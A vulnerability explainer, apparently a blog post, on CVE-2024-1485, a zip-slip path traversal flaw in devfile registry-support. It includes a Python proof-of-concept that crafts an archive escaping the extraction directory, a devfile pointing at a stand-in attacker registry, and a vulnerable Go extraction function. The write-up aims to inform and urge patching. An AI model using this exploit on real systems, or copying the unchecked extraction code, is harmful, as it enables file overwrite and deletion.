CVE-2024-1485 is a critical security vulnerability found in the open-source registry-support project. The registry-support tool is used in cloud-native development, especially with platforms like OpenShift Dev Spaces and Eclipse Che. This bug can let attackers overwrite or delete unexpected files on your system if you open a specially crafted devfile.
Let’s break down what went wrong, how bad this can get, and see some code that shows this problem in real life.
What’s the Root Cause?
The vulnerable code lives in the decompression function responsible for extracting devfiles or plugins in registry-support. If a developer opens (i.e., parses) a devfile that uses the parent or plugin keywords referencing a crafted resource, registry-support will download and extract an archive as part of the normal workflow.
The bug: When extracting archives, the cleanup code doesn’t properly check file paths. So, files with names like ../../../../etc/passwd inside the archive can overwrite or delete files *outside* the intended directory. This is called a “zip-slip” or path traversal vulnerability.
Is There Proof or an Exploit?
Yes—let’s see a quick and dirty example of what an attacker could do.
Say the system runs registry-support, and a user is tricked into opening a malicious devfile. Imagine the attacker’s plugin repository contains a ZIP or TAR file with a structure like this:
malicious-archive.zip
└── ../../../../tmp/pwned
When decompressed, a file named pwned will be dumped in /tmp or even /etc or /root, depending on permissions.
Here's a Python script for making a malicious archive
import zipfile
with zipfile.ZipFile('exploit.zip', 'w') as z:
# This file tries to escape the intended directory
z.writestr('../../../../tmp/pwned', 'Hacked by CVE-2024-1485!\n')
print('Malicious archive created as exploit.zip')
Now the attacker puts exploit.zip as the official devfile parent or plugin in a registry
schemaVersion: 2..
parent:
id: exploit-parent
registryUrl: https://evil.example.com/registry
When a victim parses this devfile using registry-support tooling, the archive is downloaded and unzipped unsafely, letting the attacker overwrite /tmp/pwned or other files. Imagine if the attacker replaces .bashrc or even deletes something critical—bad news!
Why Is This Dangerous?
- Remote, No Auth Needed: Attackers only need you (or an automated process) to open a devfile they control.
Let’s see the kind of code that causes the trouble (simplified for clarity)
func decompressArchive(archivePath, destDir string) error {
r, err := zip.OpenReader(archivePath)
if err != nil { return err }
defer r.Close()
for _, f := range r.File {
fpath := filepath.Join(destDir, f.Name)
// DANGEROUS: No checks for path traversal!
outFile, err := os.Create(fpath)
if err != nil { return err }
// ... write file ...
}
return nil
}
A better version would check that fpath never leaves destDir (by resolving paths).
How to Fix CVE-2024-1485
1. Patch: Upgrade to the latest registry-support version that validates extracted paths (official fix coming or already landed as explained in registry-support#issue254).
Official References
- NVD entry for CVE-2024-1485
- Devfile Registry-Support GitHub Advisory
- Registry-Support source code
Takeaways
CVE-2024-1485 lets attackers overwrite or delete files on your computer through a simple devfile—if you’re using registry-support and pull devfiles from untrusted sources, you could be at risk. Patch now and always check what you’re importing!
If you want a simple test, try opening a devfile with registry-support using a purposely-malicious parent archive (like our exploit above) in a sandbox—see what it does to /tmp/.
Timeline
Published on: 02/14/2024 00:15:46 UTC
Last modified on: 02/22/2024 01:15:07 UTC